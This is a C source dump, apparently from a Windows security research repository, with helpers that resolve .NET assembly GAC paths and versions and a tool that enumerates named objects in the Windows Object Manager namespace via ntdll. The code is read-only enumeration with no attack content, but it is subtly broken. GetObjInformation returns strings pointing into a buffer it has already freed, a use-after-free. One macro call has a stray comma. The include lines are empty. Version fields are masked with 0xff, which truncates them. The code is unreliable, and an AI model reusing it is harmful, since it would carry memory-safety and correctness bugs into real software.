190 | hr = pInterface->lpVtbl->QueryAssemblyInfo(pInterface, QUERYASMINFO_FLAG_VALIDATE, *pwszAssemblyName, &AssemblyInfo);
191 | if (!SUCCEEDED(hr) || AssemblyInfo.pszCurrentAssemblyPathBuf == NULL) {
192 | HeapFree(g_hProcessHeap, 0, AssemblyInfo.pszCurrentAssemblyPathBuf);
193 | pInterface = NULL;
194 | return E_FAIL;
195 | }
196 |
197 |
198 | // Copy data
199 | *pwszAssemblyGacPath = (LPWSTR)HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, AssemblyInfo.cchBuf * sizeof(WCHAR));
200 | RtlCopyMemory(*pwszAssemblyGacPath, AssemblyInfo.pszCurrentAssemblyPathBuf, AssemblyInfo.cchBuf * sizeof(WCHAR));
201 | HeapFree(g_hProcessHeap, 0, AssemblyInfo.pszCurrentAssemblyPathBuf);
202 |
203 | pInterface = NULL;
204 | return S_OK;
205 | }
206 |
207 | /**
208 | * @brief Get the version of an Assembly
209 | * @param ppIAssemblyName Pointer to an IAssemblyName interface.
210 | * @param pAssemblyVersion Pointer to an ASSEMBLY_VERSION structure.
211 | * @return Whether the function executed successfully
212 | */
213 | HRESULT GetAssemblyVersion(PPIAssemblyName ppIAssemblyName, PASSEMBLY_VERSION pAssemblyVersion) {
214 | IAssemblyName* pInterface = *ppIAssemblyName;
215 | if (pInterface == NULL || pAssemblyVersion == NULL)
216 | return E_FAIL;
217 |
218 | // Get version
219 | DWORD dwHigh = 0;
220 | DWORD dwLow = 0;
221 | HRESULT hr = pInterface->lpVtbl->GetVersion(pInterface, &dwHigh, &dwLow);
222 | if (!SUCCEEDED(hr))
223 | return E_FAIL;
224 |
225 | pAssemblyVersion->dwMajor = dwHigh >> 0x10;
226 | pAssemblyVersion->dwMinor = dwHigh & 0xff;
227 | pAssemblyVersion->dwBuild = dwLow >> 0x10;
228 | pAssemblyVersion->dwRevision = dwLow & 0xff;
229 |
230 | pInterface = NULL;
231 | return S_OK;
232 | }
233 |
--------------------------------------------------------------------------------
/Object Manager/List Objects/main.c:
--------------------------------------------------------------------------------
1 | /*+===================================================================
2 | File: main.c
3 | Summary: List named objects from the Windows Object Manager namespace.
4 | Classes: N/A
5 | Functions: N/A
6 | Origin: https://github.com/am0nsec/wspe/blob/master/Windows%20Objects/List%20Objects
7 | ##
8 | Author: Paul Laine (@am0nsec)
9 | ===================================================================+*/
10 | #pragma once
11 | #include
12 | #include
13 | #include "ntstructs.h"
14 |
15 | #pragma comment(lib, "ntdll")
16 |
17 | /*--------------------------------------------------------------------
18 | Function prototypes.
19 | --------------------------------------------------------------------*/
20 | VOID RtlInitUnicodeString(
21 | _In_ PUNICODE_STRING DestinationString,
22 | _In_ PCWSTR SourceString
23 | );
24 |
25 | NTSTATUS WINAPI NtOpenDirectoryObject(
26 | _Out_ PHANDLE DirectoryHandle,
27 | _In_ ACCESS_MASK DesiredAccess,
28 | _In_ POBJECT_ATTRIBUTES ObjectAttributes
29 | );
30 |
31 | NTSTATUS WINAPI NtQueryDirectoryObject(
32 | _In_ HANDLE DirectoryHandle,
33 | _Out_opt_ PVOID Buffer,
34 | _In_ ULONG Length,
35 | _In_ BOOLEAN ReturnSingleEntry,
36 | _In_ BOOLEAN RestartScan,
37 | _Inout_ PULONG Context,
38 | _Out_opt_ PULONG ReturnLength
39 | );
40 |
41 | NTSTATUS WINAPI NtOpenSymbolicLinkObject(
42 | _Out_ PHANDLE LinkHandle,
43 | _In_ ACCESS_MASK DesiredAccess,
44 | _In_ POBJECT_ATTRIBUTES ObjectAttributes
45 | );
46 |
47 | NTSTATUS WINAPI NtQuerySymbolicLinkObject(
48 | _In_ HANDLE LinkHandle,
49 | _Inout_ PUNICODE_STRING LinkTarget,
50 | _Out_opt_ PULONG ReturnedLength
51 | );
52 |
53 | /*--------------------------------------------------------------------
54 | Private Function
55 | --------------------------------------------------------------------*/
56 | NTSTATUS GetObjInformation(
57 | _Out_ PUNICODE_STRING pObjName,
58 | _Out_ PUNICODE_STRING pObjType,
59 | _In_ PULONG puContext
60 | );
61 |
62 | NTSTATUS GetObjSymbolicLinkTarget(
63 | _Out_ PUNICODE_STRING pObjSymbolicLinkTarget,
64 | _In_ PUNICODE_STRING pObjName
65 | );
66 |
67 | /*--------------------------------------------------------------------
68 | Global Variables
69 | --------------------------------------------------------------------*/
70 | HANDLE g_hRootDirectory = INVALID_HANDLE_VALUE;
71 | HANDLE g_hProcessHeap = INVALID_HANDLE_VALUE;
72 |
73 | INT wmain(INT argc, PWCHAR argv[]) {
74 | wprintf(L"--------------------------------------------------------------\n");
75 | wprintf(L" List named objects from the Windows Object Manager namespace\n");
76 | wprintf(L" Copyright (C) Paul Laine (@am0nsec)\n");
77 | wprintf(L"--------------------------------------------------------------\n\n");
78 |
79 | /*--------------------------------------------------------------------
80 | Check user input.
81 | --------------------------------------------------------------------*/
82 | if (argc == 1) {
83 | wprintf(L"[-] Usage: \n");
84 | wprintf(L" - WindowsObjects.exe \n");
85 | wprintf(L"[-] Examples: \n");
86 | wprintf(L" - WindowsObjects.exe \\ \n");
87 | wprintf(L" - WindowsObjects.exe \\ObjectTypes \n");
88 | wprintf(L" - WindowsObjects.exe \\Sessions\\1\\BaseNamedObjects \n\n");
89 | return 0x1;
90 | }
91 |
92 | /*--------------------------------------------------------------------
93 | Initialise variables.
94 | --------------------------------------------------------------------*/
95 | NTSTATUS status = STATUS_UNSUCCESSFUL;
96 | g_hProcessHeap = GetProcessHeap();
97 |
98 | UNICODE_STRING RootDirectory = { 0 };
99 | RtlInitUnicodeString(&RootDirectory, argv[1]);
100 |
101 | OBJECT_ATTRIBUTES ObjAttributes;
102 | InitializeObjectAttributes(&ObjAttributes, &RootDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL,);
103 |
104 | status = NtOpenDirectoryObject(&g_hRootDirectory, DIRECTORY_QUERY | GENERIC_READ, &ObjAttributes);
105 | if (!NT_SUCCESS(status) || g_hRootDirectory == INVALID_HANDLE_VALUE) {
106 | wprintf(L"[-] Error invoking ntdll!NtOpenDirectoryObject (0x%08x)\n", (DWORD)status);
107 | return 0x1;
108 | }
109 |
110 | /*--------------------------------------------------------------------
111 | Parse all objects from the directory.
112 | --------------------------------------------------------------------*/
113 | ULONG uContext = 0;
114 | wprintf(L" %+-25ws %+-30ws %ws\n\n", L"Object Type", L"Symbolic Link", L"Object Name");
115 |
116 | do {
117 | UNICODE_STRING ObjSymbolicLink = { 0, 0, NULL };
118 | UNICODE_STRING ObjName = { 0, 0, NULL };
119 | UNICODE_STRING ObjType = { 0, 0, NULL };
120 |
121 | // Get name and type of the object
122 | status = GetObjInformation(&ObjName, &ObjType, &uContext);
123 | if (!NT_SUCCESS(status))
124 | break;
125 |
126 | // Get the symbolic link target if object type is SymbolicLink
127 | if (wcscmp(ObjType.Buffer, L"SymbolicLink") == 0) {
128 | status = GetObjSymbolicLinkTarget(&ObjSymbolicLink, &ObjName);
129 | if (!NT_SUCCESS(status))
130 | break;
131 | }
132 |
133 | // Print the information to the console
134 | wprintf(L" %+-25ws %+-30ws %ws\n", ObjType.Buffer, ObjSymbolicLink.Buffer, ObjName.Buffer);
135 |
136 | // Remove data from the heap
137 | if (ObjSymbolicLink.Length != 0)
138 | HeapFree(g_hProcessHeap, 0, ObjSymbolicLink.Buffer);
139 | } while (status != STATUS_NO_MORE_ENTRIES);
140 |
141 | wprintf(L"\n\n[>] Total named objects: %d\n\n", uContext);
142 |
143 | // Cleanup and exit
144 | if (g_hRootDirectory)
145 | CloseHandle(g_hRootDirectory);
146 | return 0x0;
147 | }
148 |
149 | /*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
150 | Function: GetObjInformation
151 | Summary: Get the name and the type name of the next object in the Object Manager namespace's directory.
152 |
153 | Args: PUNICODE_STRING pObjName
154 | - Pointer to the UNICODE_STRING that stores the name.
155 | PUNICODE_STRING pObjType
156 | - Pointer to the UNICODE_STRING that stores the type.
157 | PULONG puContext
158 | - Pointer to next element to retrieve.
159 |
160 | Returns: NTSTATUS
161 | -----------------------------------------------------------------F-F*/
162 | NTSTATUS GetObjInformation(PUNICODE_STRING pObjName, PUNICODE_STRING pObjType, PULONG puContext) {
163 | POBJECT_DIRECTORY_INFORMATION pObjInformation = NULL;
164 | NTSTATUS status = STATUS_UNSUCCESSFUL;
165 | ULONG uStructureSize = 0;
166 |
167 | // Get length of the structure
168 | status = NtQueryDirectoryObject(g_hRootDirectory, NULL, 0, TRUE, FALSE, puContext, &uStructureSize);
169 | if (status == STATUS_NO_MORE_ENTRIES)
170 | return STATUS_NO_MORE_ENTRIES;
171 |
172 | if (status != STATUS_BUFFER_TOO_SMALL || uStructureSize == 0) {
173 | wprintf(L"[-] Error invoking ntdll!NtQueryDirectoryObject (0x%08x)\n", (DWORD)status);
174 | return STATUS_UNSUCCESSFUL;
175 | }
176 |
177 | // Get the information about the object
178 | pObjInformation = HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, uStructureSize);
179 | status = NtQueryDirectoryObject(g_hRootDirectory, pObjInformation, uStructureSize, TRUE, FALSE, puContext, NULL);
180 | if (!NT_SUCCESS(status)) {
181 | wprintf(L"[-] Error invoking ntdll!NtQueryDirectoryObject (0x%08x)\n", (DWORD)status);
182 | return STATUS_UNSUCCESSFUL;
183 | }
184 |
185 | *pObjName = pObjInformation->Name;
186 | *pObjType = pObjInformation->TypeName;
187 | HeapFree(g_hProcessHeap, 0, pObjInformation);
188 |
189 | return STATUS_SUCCESS;
190 | }
191 |
192 | /*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
193 | Function: GetObjSymbolicLinkTarget
194 | Summary: Get the name to the object that the symbolic link target.
195 |
196 | Args: PUNICODE_STRING pObjSymbolicLinkTarget
197 | - Pointer to the UNICODE_STRING that stores the name of the target.
198 | PUNICODE_STRING pObjName
199 | - Pointer to the UNICODE_STRING that stores the naem of the symbolic link.
200 |
201 | Returns: NTSTATUS
202 | -----------------------------------------------------------------F-F*/
203 | NTSTATUS GetObjSymbolicLinkTarget(PUNICODE_STRING pObjSymbolicLinkTarget, PUNICODE_STRING pObjName) {
204 | NTSTATUS status = STATUS_UNSUCCESSFUL;
205 |
206 | UNICODE_STRING LinkObj;
207 | RtlInitUnicodeString(&LinkObj, pObjName->Buffer);
208 |
209 | OBJECT_ATTRIBUTES SymbolicObjAttributes;
210 | InitializeObjectAttributes(&SymbolicObjAttributes, &LinkObj, OBJ_CASE_INSENSITIVE, g_hRootDirectory, NULL);
211 |
212 | HANDLE hLinkHandle = INVALID_HANDLE_VALUE;
213 | status = NtOpenSymbolicLinkObject(&hLinkHandle, GENERIC_READ, &SymbolicObjAttributes);
214 | if (!NT_SUCCESS(status) || hLinkHandle == INVALID_HANDLE_VALUE) {
215 | wprintf(L"[-] Error invoking ntdll!NtOpenSymbolicLinkObject (0x%08x)\n", (DWORD)status);
216 | return STATUS_UNSUCCESSFUL;
217 | }
218 |
219 | UNICODE_STRING SymbolicObjName = { 0, 0, NULL };
220 | ULONG lSizeSymbolicObj = 0;
221 | status = NtQuerySymbolicLinkObject(hLinkHandle, &SymbolicObjName, &lSizeSymbolicObj);
222 | if (!NT_SUCCESS(status) && status != STATUS_BUFFER_TOO_SMALL) {
223 | wprintf(L"[-] Error invoking ntdll!NtQuerySymbolicLinkObject (0x%08x)\n", (DWORD)status);
224 | CloseHandle(hLinkHandle);
225 | return STATUS_UNSUCCESSFUL;
226 | }
227 |
228 | SymbolicObjName.Buffer = HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, lSizeSymbolicObj);
229 | SymbolicObjName.Length = lSizeSymbolicObj;
230 | SymbolicObjName.MaximumLength = (USHORT)(lSizeSymbolicObj + sizeof(WCHAR));
231 |
232 | status = NtQuerySymbolicLinkObject(hLinkHandle, &SymbolicObjName, &lSizeSymbolicObj);
233 | if (!NT_SUCCESS(status)) {
234 | wprintf(L"[-] Error invoking ntdll!NtQuerySymbolicLinkObject (0x%08x)\n", (DWORD)status);
235 | CloseHandle(hLinkHandle);
236 | return STATUS_UNSUCCESSFUL;
237 | }
238 |
239 | *pObjSymbolicLinkTarget = SymbolicObjName;
240 | if (hLinkHandle)
241 | CloseHandle(hLinkHandle);
242 |
243 | return STATUS_SUCCESS;
244 | }
245 |
--------------------------------------------------------------------------------